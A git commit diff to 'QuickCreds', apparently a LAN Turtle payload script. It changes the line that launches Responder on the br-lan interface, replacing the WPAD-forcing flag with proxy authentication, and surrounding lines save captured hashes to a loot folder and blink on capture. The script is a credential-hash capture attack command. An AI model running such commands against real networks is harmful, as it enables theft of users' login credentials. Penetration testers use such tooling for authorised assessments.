Update QuickCreds
Replace --ForceWpadAuth option with --ProxyAuth and remove --fingerprintpull/16/head
parent
f011a0737f
commit
7749b58116
|
@ -112,7 +112,7 @@ ln -s /root/loot/$(printf "%04u" $newdir) /etc/turtle/Responder/logs
|
|||
/etc/init.d/dnsmasq stop 1&> /dev/null
|
||||
|
||||
# Execute attack
|
||||
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'
|
||||
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
|
||||
|
||||
# Blink upon hash capture
|
||||
while true; do
|
||||
|
|
Loading…
Reference in New Issue